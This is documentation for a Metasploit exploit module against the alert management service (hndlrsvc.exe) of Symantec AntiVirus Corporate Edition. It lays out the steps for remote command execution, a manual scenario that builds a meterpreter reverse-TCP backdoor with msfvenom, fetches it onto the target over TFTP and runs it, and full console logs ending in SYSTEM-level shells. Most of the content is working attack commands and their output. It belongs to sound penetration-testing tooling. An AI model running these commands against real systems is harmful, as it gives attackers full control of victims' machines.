## Vulnerable Application

  This module exploits Symantec System Center's alert management system (hndlrsvc.exe) with an arbitrary command execution.  The payload is uploaded via TFTP
  and then executed on the system.
  This is part of Symantec AntiVirus Corporate Edition 8.0-10.1.7

## Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: `use exploit/windows/antivirus/ams_hndlrsvc`
  4. Do: `set rhost`
  5. Do: `exploit`
  6. You should get a shell.

## Options

  **CMD**

  Optional command line to run instead of attempting to directly inject a payload

  **RPORT**

  The port the service is running on.  Default is 38292.

## Scenarios

### Manual Upload and Execute

If the module doesn't work for a shell, it's possible to run the CMD twice to emulate the steps the module takes.

1. start atftpd: `atftpd --daemon --port=69 /tftpboot/`
2. create payload: `msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 lport=4444 -f exe -o /tftpboot/backdoor.exe`
3. start metasploit
4. start a multihandler
5. load the module: `use exploit/windows/antivirus/ams_hndlrsvc`
6. use ams: `set CMD 'tftp -i 1.1.1.1 GET backdoor.exe'`
7. run
8. use ams: `set cmd 'backdoor.exe'`
9. run

  ```
root@kali:~/metasploit-framework# ./msfconsole 

msf > ifconfig
[*] exec: ifconfig

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 1.1.1.1  netmask 255.255.255.0  broadcast 192.168.3.255
        inet6 fe80::20c:29ff:fef9:62a1  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:f9:1f:a1  txqueuelen 1000  (Ethernet)
        RX packets 70933  bytes 39287343 (37.4 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 11688  bytes 3788654 (3.6 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

msf > use exploit/multi/handler 
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 1.1.1.1
lhost => 1.1.1.1
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Starting the payload handler...
msf exploit(handler) > use exploit/windows/antivirus/ams_hndlrsvc 
msf exploit(ams_hndlrsvc) > set rhost 2.2.2.2
rhost => 2.2.2.2
msf exploit(ams_hndlrsvc) > set lport 9999
lport => 9999
msf exploit(ams_hndlrsvc) > set cmd 'tftp -i 1.1.1.1 GET backdoor.exe'
CMD => tftp -i 1.1.1.1 GET backdoor.exe
msf exploit(ams_hndlrsvc) > run

[*] Started reverse TCP handler on 1.1.1.1:9999 
[*] 2.2.2.2:38292 - Executing command 'tftp -i 1.1.1.1 GET backdoor.exe'
[*] Exploit completed, but no session was created.
msf exploit(ams_hndlrsvc) > set cmd 'backdoor.exe'
cmd => backdoor.exe
msf exploit(ams_hndlrsvc) > run

[*] Started reverse TCP handler on 1.1.1.1:9999 
[*] 2.2.2.2:38292 - Executing command 'backdoor.exe'
[*] Sending stage (957999 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:1038) at 2016-09-30 11:59:13 -0400
[*] Exploit completed, but no session was created.
msf exploit(ams_hndlrsvc) > sessions -l

Active sessions
===============

  Id  Type                   Information                 Connection
  --  ----                   -----------                 ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WEBB  1.1.1.1:4444 -> 2.2.2.2:1038 (2.2.2.2)

msf exploit(ams_hndlrsvc) > sessions -v

Active sessions
===============

  Session ID: 1
        Type: meterpreter x86/win32
        Info: NT AUTHORITY\SYSTEM @ WEBB
      Tunnel: 1.1.1.1:4444 -> 2.2.2.2:1038 (2.2.2.2)
         Via: exploit/multi/handler
        UUID: 0a85ec1678bc8465/x86=1/windows=1/2016-09-30T15:59:12Z
   MachineID: 8b2889ec93a961f2cc3f2db4620def57
     CheckIn: 28s ago @ 2016-09-30 12:00:15 -0400
  Registered: No



msf exploit(ams_hndlrsvc) > 

  ```
  
### Using Standard Options
  
  ```
msf > use exploit/windows/antivirus/ams_hndlrsvc 
msf exploit(ams_hndlrsvc) > set rhost 2.2.2.2
rhost => 2.2.2.2
msf exploit(ams_hndlrsvc) > set lport 4445
lport => 4445
msf exploit(ams_hndlrsvc) > show options

Module options (exploit/windows/antivirus/ams_hndlrsvc):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   CMD                     no        Execute this command instead of using command stager
   LHOST  1.1.1.1     no        The listen IP address from where the victim downloads the payload
   RHOST  2.2.2.2   yes       The target address
   RPORT  38292            yes       The target port


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     1.1.1.1     yes       The listen address
   LPORT     4445             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Universal


msf exploit(ams_hndlrsvc) > exploit

[*] Started reverse TCP handler on 1.1.1.1:4445 
[*] 2.2.2.2:38292 - Sending request to 2.2.2.2:38292
[+] 2.2.2.2:38292 - tftp -i 1.1.1.1 GET OQTAVJBVWZH.exe
[*] 2.2.2.2:38292 - Attempting to execute the payload...
[+] 2.2.2.2:38292 - OQTAVJBVWZH.exe
[*] Sending stage (957999 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4445 -> 2.2.2.2:1041) at 2016-09-30 12:13:18 -0400

meterpreter > 

  ```
